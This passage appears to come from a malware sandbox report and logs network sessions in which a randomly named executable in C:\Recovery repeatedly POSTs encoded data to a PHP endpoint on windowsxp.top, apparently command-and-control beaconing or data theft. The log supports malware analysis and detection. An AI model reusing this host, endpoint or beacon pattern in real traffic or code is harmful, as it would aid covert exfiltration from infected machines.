                                                                                                                  Oct 27, 2024 19:23:27.454665899 CET | 929 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mw3S1PP%2FUuep5vdhjBMxpVfqDC22A7%2FbQrlgssc5M4%2Bp7Va7r%2FYbRHVLfeKUmd90XQlnyLY73cpbR%2B5MhIFTO%2FaIhKIkwXSmbU%2FWCiZZDBaaXvmn0ieSHCfO9GB5WMUu"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7a248d63aa9-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1226079&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5d 23 3e 30 57 2a 2f 36 08 3d 08 21 10 33 3c 32 00 2e 22 05 01 3e 04 21 55 3a 38 3a 51 33 1a 21 43 3c 2a 3c 59 22 3e 30 56 2a 0f 21 5e 00 1c 27 5c 35 3e 39 50 25 05 38 19 33 09 20 16 36 2e 2b 59 3d 07 3d 57 2b 00 38 5f 3f 06 01 19 3b 11 0c 09 26 07 3e 11 3b 38 26 58 2b 00 2a 54 0c 14 22 01 2d 11 3c 5b 35 08 3a 0f 29 22 28 5a 27 2e 33 08 27 3a 0d 0b 3c 2c 34 00 3c 2e 21 5c 21 05 3c 1f 2b 16 39 02 33 3e 27 1e 3e 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"]#>0W*/6=!3<2.">!U:8:Q3!C<*<Y">0V*!^'\5>9P%83 6.+Y==W+8_?;&>;8&X+*T"-<[5:)"(Z'.3':<,4<.!\!<+93>'>"T")S0YP0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  50 | 192.168.2.4 | 49939 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:27.183696985 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:27.539858103 CET | 1012 | OUT | Data Raw: 50 57 58 5c 5b 5c 56 50 54 58 57 54 54 50 5b 5d 59 5f 5b 51 52 57 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX\[\VPTXWTTP[]Y_[QRWRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY''. **"?,40%+ W;/=<$Q Z->+[?,.9?!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:27.785991907 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:28.388420105 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fj7iCPt9%2FaWzsVji%2FWeDIwardxKLg5Mp0dkPczPbU3lumwk%2F9FZGDnyfUO47gWfjEApRx%2FlpNRoaH4Q0Smbi%2BP633ie9UWaxUeZiecgZUvyn34Zn7OI3qND7QzmTByqg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7a64e6e6bfb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1061&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1400386&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0
                                                                                                                  Oct 27, 2024 19:23:28.389286995 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fj7iCPt9%2FaWzsVji%2FWeDIwardxKLg5Mp0dkPczPbU3lumwk%2F9FZGDnyfUO47gWfjEApRx%2FlpNRoaH4Q0Smbi%2BP633ie9UWaxUeZiecgZUvyn34Zn7OI3qND7QzmTByqg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7a64e6e6bfb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1061&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1400386&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  51 | 192.168.2.4 | 49948 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:28.756151915 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:29.102458954 CET | 1012 | OUT | Data Raw: 50 50 58 54 5e 5c 56 57 54 58 57 54 54 56 5b 59 59 59 5b 51 52 54 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXT^\VWTXWTTV[YYY[QRTRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$20Z"!4-' \38,><U*?77! 8_><--/!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:29.360512972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:29.762352943 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSHpVh5k0xRcj34Amn7rE4mhMKgxrOBsLtebyfiX01lI%2BZRmv%2BP%2Bq5mul2szEpASG7N7nuhfQud%2Fa2J9iVMn3WVUPgEr%2FBz1TpLnCuPidR3mozQ%2BCt%2FtmAzUhBREqPCO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7b0187d6c7f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1434&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1191769&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:29.762517929 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0
                                                                                                                  Oct 27, 2024 19:23:29.762656927 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  52 | 192.168.2.4 | 49954 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:29.902301073 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:30.264959097 CET | 1008 | OUT | Data Raw: 55 53 58 54 5e 52 53 55 54 58 57 54 54 55 5b 5f 59 58 5b 59 52 50 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USXT^RSUTXWTTU[_YX[YRPRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z%.^ *66% -<%+$,.#*,4#"38.?Z>%9?!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:30.500969887 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:30.802417040 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hkuu2KeH6qerLdxxS7PE7IjIHyDaATvdGAGZiRckqsLo6KJH%2FC59ti657EY6Tungd7jnHT%2FK3MQByaktO5%2Fhp2Fazj%2FsL39Unrlsd7hBFiY%2BZPAKSJft9o1fhzFWpoif"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7b74c816c6f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1236549&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  53 | 192.168.2.4 | 49961 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:30.935734987 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:31.290782928 CET | 1012 | OUT | Data Raw: 50 51 5d 59 5b 5f 56 52 54 58 57 54 54 5c 5b 58 59 51 5b 5a 52 52 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQ]Y[_VRTXWTT\[XYQ[ZRRRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\%>X6\5Y#%(.77'('--4) +_/=_*/>:!Y##X(
Oct 27, 2024 19:23:31.529575109 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:31.729537964 CET | 780 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5qNN2%2Be5s07YIhpBc8wvQgs210iKRN7Ujaq992Zc%2FGALem6Uz9joRWNyWuoiJwOQ8%2FVRk%2FB%2BGTV%2BB4xyLHXvWibMDXiSkc%2Fgbij7XCSCMJXn7g07uRHW4uSYVN1Md4Bw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7bda9813ac7-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1364750&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49967 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:31.854618073 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:32.211734056 CET | 1012 | OUT | Data Raw: 50 50 58 54 5e 53 56 53 54 58 57 54 54 57 5b 5b 59 5a 5b 5d 52 56 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXT^SVSTXWTTW[[YZ[]RVR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'[&.76:^":70+#8;*$#--8)Z9.!Y##X(+
Oct 27, 2024 19:23:32.473299980 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:32.771877050 CET | 769 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fE1LQ%2BX5fJn99mvLrpHkEedf857JqTSaUY4GGIHt%2Fs537nycWwA6zo5BJ6wXYvE8OdRoFvlmgU8mc%2F2%2BnsvYpbPpHgWZNfVOD1AzztI3hX7bcJi0kx7rfJMjQbkLQKco"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7c39b25e702-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1304504&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
Oct 27, 2024 19:23:32.771898031 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49970 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:32.497273922 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:32.852332115 CET | 1716 | OUT | Data Raw: 50 56 58 5c 5b 59 56 53 54 58 57 54 54 54 5b 5f 59 5d 5b 59 52 5e 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVX\[YVSTXWTTT[_Y][YR^R^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1> _ )6#&'-'/$^78+=,8Q#Z8=X><.,?!Y##X('
Oct 27, 2024 19:23:33.110871077 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:33.442723989 CET | 919 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s4sTc8ppIPVnbng1zQ6zvO9d2Yn0Ma8kpXN44Nj6r6L7z8dKxzGWBOfgvN0sTwOUrafGtB8oshmwUsOPN9BZ%2FpSHvyFrOVSr8VjWMy8f%2BqD8XzG9r8dEeYeDHXrDl8aR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7c7896be530-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1186&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1253679&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5f 22 3e 28 1e 29 3c 2d 55 29 0f 29 5a 30 02 0f 10 2c 0b 2b 02 2a 2d 26 0f 2f 28 25 0e 33 27 29 08 28 17 38 12 23 2d 24 54 2a 25 21 5e 00 1c 24 05 21 10 0f 14 27 38 2c 5c 27 20 30 16 22 2e 2b 5e 2b 3d 26 0c 3f 39 2b 07 2b 38 01 50 2c 11 3e 09 27 29 32 5b 2d 28 22 5f 3c 2a 2a 54 0c 14 21 58 2d 59 23 02 22 31 26 0e 29 31 38 5a 27 10 37 09 33 04 2f 0f 3f 02 37 1b 28 03 14 00 36 5a 34 5d 2b 01 36 14 27 13 09 5c 2a 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"_">()<-U))Z0,+*-&/(%3')(8#-$T*%!^$!'8,\' 0".+^+=&?9++8P,>')2[-("_<**T!X-Y#"1&)18Z'73/?7(6Z4]+6'\*"T")S0YP0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49974 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:32.903196096 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:33.258712053 CET | 1012 | OUT | Data Raw: 55 54 5d 5f 5e 52 56 51 54 58 57 54 54 50 5b 5a 59 58 5b 5f 52 51 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UT]_^RVQTXWTTP[ZYX[_RQRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&.,^ )9#5<-34/=;)P#! 8=$=Z&_-!Y##X(7
Oct 27, 2024 19:23:33.497855902 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:33.700144053 CET | 768 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIHsf79lZ9BuhhuYBFiHgvdZbKut9POYaJyNQzr2poHdJaZc3Vi7DfrTiZRBCQZ8HNblNQlRu9yteJB%2ByOyWV86rGkm6bm3HHgIdoGBBew7BcILfUlKxCRbOzTUzNOO2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7c9f8e76c14-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1386973&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49980 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:33.851488113 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:34.196213961 CET | 1012 | OUT | Data Raw: 55 5b 5d 58 5b 58 56 5e 54 58 57 54 54 56 5b 5d 59 51 5b 50 52 53 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: U[]X[XV^TXWTTV[]YQ[PRSRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1X6"!& .3, (,+#13^,.4?<5-!Y##X(/
Oct 27, 2024 19:23:34.468152046 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:34.683489084 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
